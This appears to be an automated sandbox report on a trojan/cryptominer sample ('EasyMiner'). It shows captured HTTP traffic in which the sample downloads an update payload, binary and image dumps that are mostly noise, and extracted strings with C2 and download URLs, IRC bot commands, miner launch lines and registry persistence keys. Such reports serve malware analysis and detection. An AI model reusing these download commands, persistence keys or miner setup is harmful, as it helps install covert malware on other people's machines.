t; <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-
c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf
="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description
 rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRe
f="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://n
s.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:E84C0FA586C9E2
118227F432BD1E8AC6" xmpMM:DocumentID="xmp.did:ADA64D46D35A11E28478828B
C952DFE0" xmpMM:InstanceID="xmp.iid:ADA64D45D35A11E28478828BC952DFE0" 
xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedF
rom stRef:instanceID="xmp.iid:EC4C0FA586C9E2118227F432BD1E8AC6" stRef:
documentID="xmp.did:E84C0FA586C9E2118227F432BD1E8AC6"/> </rdf:De
scription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"
?>....Adobe.d......................................................
......................................................................
.....................@................................................
........................................!..1A..Qa.q.".....2....B#..Rb.
r3$.....C..S4%..cs..D....d5&Tt...E6.....F..V.......................!1Q
.A..a..R.q."B.....2..b.S..r.3.#C.c....$s4.............?....@....@....@
....@....@....@....@....@....@....@....@....@....@....@....@....@....@
....@....@....@....@....@....@....@....@....@....@....@....@....@.<<< skipped >>>

GET /easyminer/ip.php HTTP/1.1

Connection: Keep-Alive

Host: lotusulalb2.ro

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


HTTP/1.1 200 OK

Cache-Control: public, max-age=3600

Expires: Fri, 21 Jul 2017 16:05:37 GMT

Content-Type: text/html

Content-Length: 92

Date: Fri, 21 Jul 2017 15:05:37 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: close

194.242.96.218,127.0.0.1,72,false,%hXXp://openradiodirectory.com,%&,%t
ruer,%truec,%trued,%xd..

GET /serving/cookie/match/?CC=1&party=1009 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: dmp.adform.net

Connection: Keep-Alive

Cookie: uid=5968840930698789580


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 21 Jul 2017 15:05:42 GMT

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=15

Location: hXXp://ps.eyeota.net/match?uid=5968840930698789580&bid=9gdtmu1

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 21 Jul 2017 15:05:42 GMT
..Content-Length: 0..Connection: keep-alive..Keep-Alive: timeout=15..L
ocation: hXXp://ps.eyeota.net/match?uid=5968840930698789580&bid=9gdtmu
1..

GET /easyminer/updt.zip HTTP/1.1

User-Agent: JEDI-VCL

Host: lotusulalb2.ro

Cache-Control: no-cache


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:52 GMT

Last-Modified: Wed, 19 Jul 2017 20:15:23 GMT

Content-Type: application/zip

Content-Length: 5410816

Date: Fri, 21 Jul 2017 15:05:52 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive

MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
..........<...................@.......................... S........
..........@...............................5.......T:..................
0............................... .....................................
.................CODE................................ ..`DATA.........
.......................@...BSS......?...........|...................id
ata...5.......6...|..............@....tls.............................
........rdata....... ......................@..P.reloc.......0.........
.............@..P.rsrc....T:......T:..<..............@..P..........
... S.......R.............@..P........................................
......................................................................
....................................................@...Boolean.......
....@..False.True.@.,.@...Char..........@.@...Smallint..........X.@...
Integer...........p.@...Byte............@...Word............@...Cardin
al............@...Int64...................@...Double..@...@...Currency
....@...WordBool...........@..False.True....@...String .@...WideString
0.@...Variant.@.@.@...OleVariant..@...............................@...
.......A@..A@..A@..A@..A@.@>@.\>@..>@..TObject..@...TObject..
@........System....@...IInterface....................F.System.....

<<< skipped >>>

GET /site/27675?dt=0&r=1573727964&sig=1370858844&bkca=KJhBM1WvQp91CoIZcG5B m3CClPm5 ApiBm0aZtPsCiIdKJBYcdIM8ewEhgSjtVD1ADobygvOkuOXe90OTOs PtVnskcRzAt80woFFd1wxkLUtry9FvlMp8IrRpotsQ5Ph2loMO188UzZUqReNbdTqCvjojzKVatHJF9rTYm8lynw o6i8SRLbxkuAuLNH2GNekr HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tags.bluekai.com

Connection: Keep-Alive

Cookie: bkdc=phx; bku=sty99WRRzkZJtxWL


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:42 GMT

Content-Type: image/gif

Content-Length: 62

Connection: keep-alive

X-XSS-Protection: 0

P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="hXXp://tags.bluekai.com/w3c/p3p.xml"

Pragma: no-cache

Expires: Thu, 01 Dec 1994 16:00:00 GMT

Cache-Control: max-age=0, no-cache, no-store

Set-Cookie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:05:42 GMT; path=/; domain=.bluekai.com

BK-Server: 941c

GIF89a.............!..NETSCAPE2.0.....!.......,...........L..;HTTP/1.1
 200 OK..Date: Fri, 21 Jul 2017 15:05:42 GMT..Content-Type: image/gif.
.Content-Length: 62..Connection: keep-alive..X-XSS-Protection: 0..P3P:
 CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policy
ref="hXXp://tags.bluekai.com/w3c/p3p.xml"..Pragma: no-cache..Expires: 
Thu, 01 Dec 1994 16:00:00 GMT..Cache-Control: max-age=0, no-cache, no-
store..Set-Cookie: bku=sty99WRRzkZJtxWL; expires=Wed, 17-Jan-2018 15:0
5:42 GMT; path=/; domain=.bluekai.com..BK-Server: 941c..GIF89a........
.....!..NETSCAPE2.0.....!.......,...........L..;..

The Trojan-Banker connects to the servers at the folowing location(s):

iexplore.exe_3712:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

iexplore.exe_2296:

.text

`.data

.rsrc

@.reloc

>.uzf

.us;}

IEFRAME.dll

MLANG.dll

iertutil.dll

urlmon.dll

ole32.dll

SHELL32.dll

SHLWAPI.dll

msvcrt.dll

USER32.dll

KERNEL32.dll

ADVAPI32.dll

RegOpenKeyExW

RegCloseKey

GetWindowsDirectoryW

_amsg_exit

_wcmdln

UrlApplySchemeW

PathIsURLW

UrlCanonicalizeW

UrlCreateFromPathW

iexplore.pdb

KEYW

KEYWh

KEYWD

.ENNNG.

a.ry.v

l.igM4

?1%SGf

xh.JW^

.97777"7" " " !

3.... ))

8888888888888

8888888888

.lPV)

úW1

.ApX/

H.ZAf

ð[U

%s!FK

1YYYY1YY9GEAA=77YRNNNW:.VT1

888777777

Y.hilkRROMLK=C,

..(((($$

3...((((%

3....(.''$

3.2...((((%

33.2....(,'

55323222...

(%&'00443445?

00.,,,4(

000.,,9(

0020..9(

003200;(

(#'( (''''!'!

Microsoft.InternetExplorer.Default

user32.dll

Kernel32.DLL

xfire.exe

wlmail.exe

winamp.exe

waol.exe

sidebar.exe

psocdesigner.exe

np.exe

netscape.exe

netcaptor.exe

neoplanet.exe

msn.exe

mshtmpad.exe

mshta.exe

loader42.exe

infopath.exe

iexplore.exe

iepreview.exe

groove.exe

explorer.exe

dreamweaver.exe

contribute.exe

aol.exe

{28fb17e0-d393-439d-9a21-9474a070473a}

Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings

DShell32.dll

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe

Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}

"%s" %s

Kernel32.dll

\AppPatch\sysmain.sdb

-extoff go.microsoft.com/fwlink/?LinkId=106323

-extoff go.microsoft.com/fwlink/?LinkId=106322

-extoff go.microsoft.com/fwlink/?LinkId=106320

kernel32.dll

{00000000-0000-0000-0000-000000000000}

\\?\Volume

shell:%s

Imaging_CreateWebPagePreview_Perftrack

Browseui_Tabs_Tearoff_BetweenWindows

Frame_URLEntered

Imaging_CreateWebPagePreview

WS_ExecuteQuery

Shdocvw_BaseBrowser_FireEvent_WindowStateChanged

IdleTask_Execution_Time

9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)

IEXPLORE.EXE

Windows

9.00.8112.16421

%original file name%.exe_796:

.idata

.rdata

P.reloc

P.rsrc

kernel32.dll

Windows

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

EVariantBadIndexError

Uh.qA

ssShift

htKeyword

EInvalidOperation

u%CNu

%s[%d]

%s_%d

.Owner

EInvalidGraphicOperation

comctl32.dll

USER32.DLL

windows

uxtheme.dll

%s%s%s%s%s%s%s%s%s%s

Proportional

Uh&%D

MAPI32.DLL

OnKeyDown@

OnKeyPress

OnKeyUp

vsReport

RICHED32.DLL

TComboBoxExEnumerator

ole32.dll

PasswordChar

ssHorizontal

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

tagMSG

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

TKeyEvent

TKeyPressEvent

HelpKeyword|

crSQLWait

%s (%s)

imm32.dll

AutoHotkeys

$URL$

JCL\source\windows

windows-1256

windows-1257

windows-1250

windows-1251

windows-1253

windows-1255

csShiftJIS

csWindows31J

windows-874

windows-1254

ISO_646.irv:1991

windows-1258

Windows-1252

SOFTWARE\Microsoft\Windows NT\CurrentVersion

ccIDSBinaryOperator

ccIDSTrinaryOperator

ccJoinControl

Mathematical Operators

Supplemental Mathematical Operators

Transport And Map Symbols

TRootKey

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_CURRENT_CONFIG

HKEY_DYN_DATA

EJclMutexError

TJclIntfCriticalSection$URL$

TUnitVersioning$URL$

JclBase$URL$

ErrorMsg

shell32.dll

OnActionExecute(

1.2.2

Portable Network Graphics

PngImage%d

.jpeg

TSQLTimeStampVariantType

TSQLTimeStampData

SqlTimSt

d:\program files\delphi7se\Source\Vcl\SqlTimSt.pas

SQLTimeStamp

user32.dll

\AppEvents\Schemes\Apps\.Default\

SystemNotification\.Current

SystemHand\.Current

SystemAsterisk\.Current

SystemQuestion\.Current

SystemExclamation\.Current

solokey

441414288@qq.com

getservbyport

WSAAsyncGetServByPort

WSAJoinLeaf

WS2_32.DLL

127.0.0.1

TIdSocketListWindows

TIdStackWindowsU

IdStackWindows

%s, %.2d %s %.4d %s %s

%s, %d %s %d %s %s

TIdEncoder3to4.Encode: Calculated length exceeded (expected

D:\Proiecte delphi\EasyMiner_2017-05-18\NEW\easymining_source\src\indy9\IdCoder3to4.pas

TIdEncoder3to4.Encode: Calculated length not met (expected

Port

rlAutoKeyboard

TRichEditURLClickEvent

URLText

TRichEditURLHoverEvent

ClipboardOperationKind

AutoURLDetect

OnURLClick

OnURLHover

Import\

Export\

%s - %s

RICHED20.DLL

edt1KeyDown

edt2URLClick

msgboxContextPopup

lstchat2URLClick

lstchatURLClick

Edit1KeyDown

ChatLog.txt

AnounceLog.txt

supports

Uh.mO

importNode

%s="%s"

%s%s%s: %d%s%s

Invalid parameters passed to EscapeReplace function

hXXp://netchatlink.sourceforge.net/update.php

Nick

Password

Example: PRIVMSG NickServ :IDENTIFY %n %p

autrunwindows$

lblHubHostPort4

lblHubNick8

lblHubPass<

spnHubMsgRate`

edHubHostPort

edHubNick

edHubPass

spnIrcMsgRate

lblIrcNick

lblIrcPass

edIrcHostPort0

edIrcNick4

edIrcPass8

chkmodifyport

autrunwindowsTimer

chkautowindowsClick

Creating a new nickname :

Modifying nickname to

nick to new nick :

settings.xml

hubs.ini

ircs.ini

users.ini

filterwords.ini

MsgRate

HostPort

%s:%d

debug.txt

\EasyMiner.lnk

hXXp://sourceforge.net/p/shoutcastgui/donate/?source=navbar

hXXps://blockchain.info/address/165uTCtCy5S9PWGeBp2mNNKYfqRuHhwYYv

VVV.facebook.com/plugins/like.php?href=http://sourceforge.net/projects/shoutcastgui/&send=false&layout=button_count&width=80&show_faces=false&action=like&colorscheme=light&font&height=21

hXXp://easyminer.net

hXXp://shoutcastgui.com

hXXps://VVV.facebook.com/mwplayer2

JvUrlGrabbers`

TJvProxyingUrlGrabber

TJvProxyingUrlGrabber`

JvUrlGrabbers

&TJvProxyingUrlGrabberDefaultProperties

&TJvProxyingUrlGrabberDefaultProperties|

TJvFtpDownloadMode

!TJvFtpUrlGrabberDefaultProperties

ProxyPassword

Passive,

TJvFtpUrlGrabber

JvUrlGrabbers

Passwordl

TJvFtpUrlGrabberThread

TJvHttpUrlGrabber

TJvHttpUrlGrabberT

"TJvHttpUrlGrabberDefaultProperties

ProxyPassword\

TJvHttpUrlGrabberThread

TJvHttpsUrlGrabber

#TJvHttpsUrlGrabberDefaultProperties

TJvLocalFileUrlGrabber

TJvLocalFileUrlGrabberThread

TJvLocalFileUrlGrabberProperties

hXXp://

PTF://

HTTP/1.0

hXXps://

Secure HTTP

TJvUrlGrabberTimeOut

JvUrlListGrabber

TJvUrlGrabberDefPropEdTrick0

TJvUrlGrabberDefPropEdTrick

$TJvCustomUrlGrabberDefaultProperties

TJvUrlGrabberProgressEvent

TJvCustomUrlGrabber

TJvCustomUrlGrabberThreadd

TJvUrlGrabberClassList

%s: %s

temp0a0.exe

TEMP0A0.EXE

0.0.0.0

255.255.255.255

%d.%d.%d.%d

ws2_32.dll

wship6.dll

HTTPS

THookVerifyCert

LT_SSHv2

SocksPort

SocksPasswordT

TTCPBlockSocket

HTTPTunnelIP

HTTPTunnelPort

HTTPTunnelUser

HTTPTunnelPassT

HTTPTunnelTimeoutlZQ

KeyPassword

CertificateFile

PrivateKeyFile

Certificate

PrivateKey

TrustCertificateFile

TrustCertificate

CertCA

CertCAFile

VerifyCert

SSHChannelType

SSHChannelArg1

SSHChannelArg2T

CertComplianceLevel

OnVerifyCert

TargetPort

Synapse TCP/IP Socket error %d: %s

Operation would block

Operation now in progress

Operation already in progress

Socket operation on nonsocket

Protocol not supported

Socket not supported

Operation not supported on Socket

Protocol family not supported

Address family not supported

Winsock DLL cannot support this application

0.0.0.1

HTTP/1.0

HTTP/

SSL/TLS support is not compiled!

Without SSL support

Error loading Socket interface (ws2_32.dll)!

THTTPSend

THTTPSend

httpsend

ProxyPort

ProxyPass

AddPortNumberToHost

Mozilla/4.0 (compatible; Synapse)

HTTP/

WbemScripting.SWbemLocator

SELECT %s FROM %s

%d Days, %s

Report this Bug to : buzzbuzzu@gmail.com

To Unban contact : buzzbuzzu@gmail.com

# Tune in to Listen Here -> hXXp://

/listen.pls

# Listen Online Streams at -> hXXp://

/index.html

#hXXp://

# hXXp://

# hXXp://openradiodirectory.com/?mode=play&id=

legals.txt

urler

tmrcheckpassD

tmrexecutebat\

tmrexecutebat2

urlerDoneStream

tmrcheckpassTimer

tmrexecutebatTimer

tmrexecutebat2Timer

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

Payments.log

Important notice

MyDonation.txt

Earnings.log

hXXp://openradiodirectory.com/mobile/check3.php?key=

web.xml

hXXp://lotusulalb2.ro/mobile/check3.php?key=

/mobile/check3.php?key=

hXXp://lotusulalb2.ro/easyminer/ip.php

hXXp://lotusulalb2.ro/mobile/check33.php?key=

/mobile/check33.php?key=

hXXp://easyminer.net/

hXXp://lotusulalb2.ro/donations/check.php?key=

/donations/check.php?key=

runwallet.bat

7z.exe x wallet.7z -y

runminer.bat

7z.exe x Easy.7z -y

hXXp://lotusulalb2.ro/easyminer/

hXXp://lotusulalb2.ro/easyminer/updte.zip

hXXp://lotusulalb2.ro/easyminer/updt.zip

[EASY MINING] Easy Mining senddata failed .Trying resend! /

7z.exe

Sending initial NICK and USER commands

NICK %s

USER %s "" %s :%s

NickServ

Joining:

erroneous nickname

Authentication error: Bad password

Error joining

: incorrect/missing channel key

353.cmd :The channel list was empty.Disconnecting

NICK

Nick change detected

Nick change detected :

***%s%s

JOIN

Joined channel:

PRIVMSG

* %s %s

<%s> %s

.vers

.listen

.listen1

.trei

.patru

.cinci

.sase

.adr1

.gote

.gotef

.goterr

.goterrn

.gotban

.broupdt

.broupdt2

.online?

PRIVMSG %s :%%s

JOIN

olepro32.dll

updater.exe

Updating ...Please wait

offlinemsgs.txt

CommentURL

password

IdHTTPHeaderInfo

ProxyPasswordT

Mozilla/3.0 (compatible; Indy Library)

ftpTransfer

ftpReady

ftpAborted

ClientPortMinT

ClientPortMax

EIdCanNotBindPortInRange

EIdInvalidPortRangeSVW

libeay32.dll

ssleay32.dll

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_certificate_file

SSL_get_peer_certificate

SSL_CTX_set_default_passwd_cb

SSL_CTX_set_default_passwd_cb_userdata

SSL_CTX_check_private_key

X509_STORE_CTX_get_current_cert

des_set_key

saUsernamePassword

PasswordT

TIdTCPConnection

TIdTCPConnection xS

IdTCPConnection

EIdTCPConnectionError

sslvrfFailIfNoPeerCert

TPasswordEvent

RootCertFilel

CertFilel

KeyFile

OnGetPasswordh

EIdOSSLLoadingRootCertError

EIdOSSLLoadingCertError

EIdOSSLLoadingKeyError

TIdTCPClient

TIdTCPClient,

IdTCPClient

BoundPort

PortU

TIdHTTPMethod

IdHTTP

TIdHTTPOption

TIdHTTPOptions

TIdHTTPProtocolVersion

TIdHTTPOnHeadersAvailable

TIdHTTPOnRedirectEvent

TIdHTTPResponse

TIdHTTPRequest

TIdHTTPProtocol

TIdCustomHTTP

TIdHTTP

HTTPOptions

PortH

EIdHTTPProtocolException

https

This request method is supported in HTTP 1.1

HTTP/1.0 200 OK

hXXp://tunemein.eu/easyminer/

hXXp://buzzbuzzu.users.sourceforge.net/easyminer/

hXXp://openradiodirectory.com/easyminer/

hXXp://cinemaonline.tk/easyminer/

hXXp://shoutcastgui.com/easyminer/

hXXp://shoutcastgui.ro/easyminer/

hXXp://shoutcastgui.eu/easyminer/

hXXp://curukslas.ro/easyminer/

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

ip.php

registrar.txt

%http

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36

hXXp://checkip.dyndns.org/

,127.0.0.1,

41,false,%hXXp://lotusulalb2.ro,

choosenick<

Passl

Login1

WebWallet1F

Login1Click

choosenickTimer

urlerffertDoneStream

urlerffertDoneFile

WebWallet1Click

Nick change detected ::

EasyMiner.exe.manifest

autowindows

modifyport

NICK

0,4 Google me here : hXXps://VVV.google.com/search?client=kmeleon&q=

Easyminer.net

listen.pls

index.html

Auto Rember password

Memo2KeyUp

edtMemo2KeyUp

memo23KeyDown

memo1URLClick

PMLog.txt

Invalid pixel x: %d, y: %d

Invalid pixel x: %f, y: %f

Invalid scanline Row: %d

savetime2k@hotmail.com

d:\program files\delphi7se\Source\Vcl\OleServer.pas

IWebBrowser

IWebBrowserApp0

IWebBrowser2d

TWebBrowserStatusTextChange

TWebBrowserProgressChange

TWebBrowserCommandStateChange

TWebBrowserTitleChange

TWebBrowserPropertyChange

TWebBrowserBeforeNavigate2

TWebBrowserNewWindow2

TWebBrowserNavigateComplete2

TWebBrowserDocumentComplete

TWebBrowserOnVisible

TWebBrowserOnToolBar

TWebBrowserOnMenuBar

TWebBrowserOnStatusBar

TWebBrowserOnFullScreen

TWebBrowserOnTheaterMode

TWebBrowser

GPUMinerPassword`

GPUMinerPortl

StratumProxyPortx

CPUMinerPort

CPUMinerPassword

chkautowindows

ccminerextracmdp

00-00-00-00-00-00

ethernet.adapters

hdd.id

about.htm

easy_mining.ini

stratumport

stratum tcp://litecoinpool.org

port

customcmd

customcmd2

custom cmd ccminer

getting_started.htm

-port

-pass

-gport

-gpass

-sport

EOleException %s %x

stratumproxy\mining_proxy.exe -pa scrypt

Launching GPU Miner (cgminer.exe) with the following arguments:

cgminer\cgminer.exe -u

cudaminer\cudaminer.exe

--algo scrypt -i 0 --url

--userpass

--algo scrypt -i 1 --url

NOTE: cudaminer likes to report in bursts, so expect no reports for a while.

cpuminer-x32\minerd.exe

--algo scrypt --url

NOTE: minerd likes to report in bursts, so expect no reports for a while.

WARNING: Can't launch cgminer.exe!

Some information is missing. Please click "Stop Mining & Back to Settings!" to back up and check your Setup.There is no need of an action if you left those settings empty on purpose!

cgminer\cgminer.exe --scrypt -u

WARNING: Can't launch cudaminer.exe!

Launching GPU Miner (cudaminer.exe) with the following arguments:

WARNING: Can't launch minerd.exe!

Launching CPU Miner (minerd.exe) with the following arguments:

cpuminer-x64\minerd.exe

stratum.sa

WARNING: Can't launch cgminer.exe!Host,port,username or password are empty

cgminer\cgminer.exe -u

[(OPENCL)cgminer.exe]

Launching CCMiner (ccminer.exe) with the following arguments:

\cudaminer\ccminer.exe

Ccminer not found..downloading ccminer! Please wait until the file download completes..

cudaminer\ccminer.exe

hXXp://lotusulalb2.ro/easyminer/ccminer.7z

cudaminer\ccminer.exe -a scrypt -o stratum tcp://litecoinpool.org:3333 -u stratum.1sa2 -p 188

[(CUDA)cgminer.exe]

[(CPU)minerd.exe]

Cudaminer Stratum Error.Switching to ccminer! Please click Start mining again..

cudaminer.exe

minerd.exe

cgminer.exe

cgminer-nogpu.exe

ccminer.exe

Easy Mining will default to OpenCL support, but this may or may not work with your hardware.

Easy Mining will default to OpenCL support, but this may or may

wallet\index.html

and run Index.html manually to generate a Litecoin Adress

hXXp://easyminer.net/blog/

on litevault.net site

hXXps://VVV.litevault.net/

Go to hXXps://VVV.litevault.net/ manually to generate a Litecoin Adress

hXXps://VVV.facebook.com/EasyMinerSoftware/

System Idle time: %d s

hXXp://easyminer.net/Pool-Stats/

To retrieve wallet stats visit the webwallet

deflate 1.2.2 Copyright 1995-2004 Jean-loup Gailly

inflate 1.2.2 Copyright 1995-2004 Mark Adler

?456789:;<=

!"#$%&'()* ,-./0123

C:\Log\Easyminer_Log_21Jul2017_1806.txt

5e7958fce4d0905.exe" deltemp

.kuiohu

1iukJnu2.iu

GetKeyboardType

advapi32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

RegFlushKey

PeekNamedPipe

GetWindowsDirectoryA

GetCPInfo

CreatePipe

mpr.dll

version.dll

gdi32.dll

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MsgWaitForMultipleObjects

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

EnumWindows

EnumThreadWindows

ActivateKeyboardLayout

winspool.drv

ShellExecuteA

wininet.dll

InternetOpenUrlA

HttpSendRequestA

HttpQueryInfoA

HttpOpenRequestA

FtpGetFileSize

FtpOpenFileA

comdlg32.dll

wsock32.dll

winmm.dll

netapi32.dll

oledlg.dll

IPHLPAPI.DLL

; ;$;(;,;0;4;8;<;@;

4%5x5

7 88U8s8z8

? ?$?(?,?0?4?8?

4 4$4(464

5#6'6/646

2 3$3(3,30343

2"3*3.343

9"9*979>9

5064686<6

00141<1@1

7#717?7]7

: :$:(:,:0:4:8:<:@:`:~:

9!9&9.939

:(;?;];~;

='>>>\>~>

0%0/050>0

3 3$3(3,3034383<3@3\3|3

041;1]1{1

? ?$?(?,?0?>?^?

5 5$525`5

0%1x1Q3"4X4^5

55P5_5o5

1!1%1)1-11151

? ?$?(?,?0?4?8?<?

9%9u9

41494]4~4

? ?$?(?,?0?4?8?<?@?`?

<,=0=4=}=

9;9@9[9`9

7-72777W7}7

3 3 3?3\3

9 9$9(9,90949

333333333333333333

33333833

3333333333333338

:*"*"$3338

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

-888=8=88=8?8>>8>7>8>8>8>8>>8

8<888=88=888>88>8>8>8>8>8>88>

<888=88=88=>8>>8>8>8>8>8>8>>8

8<8=88=88=88>88>8>8>8>8>8>7>8

-<8=88=88=88>8>>8>8>8>8>8>8>8>

<888=88=88=>8>88>8>8>8>8>8>8>8

<88=88=88=88>8>>8>8>8>8>8>8>88

-8888=88=88>>8>7>>8>8>8>8>8>8>>

7888=88=88?88>8>88>8>8>8>8>8>88

88=88=88=8>>8>8>7>>8>8>8>8>8>88

<8888=88=888>8>8>8>>888>8888>>7>

8<=<=88=88>>8>8>8>7>8>8>8>>88>8>

7<?8<=88=8>>>8>8>8>8>888>>>88>8>8

<?<<8=88=8?8>8>8>8>8>88>8888>8>88

6666666666

26666666666

66666666666

666666666666

crtdll_wrapper

KWindows

UrlMon

%CnWaterEffect

IdTCPStream

 IdTCPServer

0IdHTTPHeaderInfo

uhttpsend

.ScktComp

RichEditURL

?HTTPApp

>WebConst

rSqlTimSt

JvExExtCtrls

Font.Charset

Font.Color

Font.Height

Font.Name

Font.Style

Icon.Data

Open Offline Msg

Picture.Data

3.!72 4/):7#41

vF{rAvm=ri:of:me=nf;ld:ia8g_8d]6b[5_X4]V5[U1WQ.RL*LF%GA#C>"B="B=

xJ}uH{sGzrExpEvnBsk>og>og?nf<kc8g_2aY.ZS,VO'PI*PJ QK(NH%IC!E?

u@}s?|r?|rA}sD}tCtlCrjAph>me=ib9e^5aZ2^W/YR.XQ,VO TM(QJ&OH$MF'KE%@<)@<&=9

#0.Xxs

###444???000

***888555

444///444

;;;444,,,

! "'&$)(#('

. !41!63

62$;7(A=.GC/JF/JF,JE/SM.TN0VP3YS4]V7`Y9b[9c\7aZ:d]=ibBngFrkJvoO{tQ

84 ;7%C>/MH7WR=]X2RM4TO7WR<\W@b\CgaGkeFlfBkdBleBngEqjFumIxpKzrL{sU

51$=9'B>'B>#A<.NI/QK0TN4XR6\V:`Z;d]>d^Ce^Ef_GhaJleMohNskOvnNwoR{sR}tQ~uR

84!:6-GA.HB1KE5OI8TN<XR=\U<]V>_X>`YAc\Ch`FkcHogKrjJskIvmHwnJypM|sP

Remember my ID/Password

Lines.Strings

<Server>chat.freenode.net:6667</Server>

<Nick>^icecaster</Nick>

<Pass/>

<MsgRate>0</MsgRate>

<Server>banks.freenode.net:6667</Server>

<Server>bradbury.freenode.net:6667</Server>

<Server>brooks.freenode.net:6667</Server>

<Server>roddenberry.freenode.net:6667</Server>

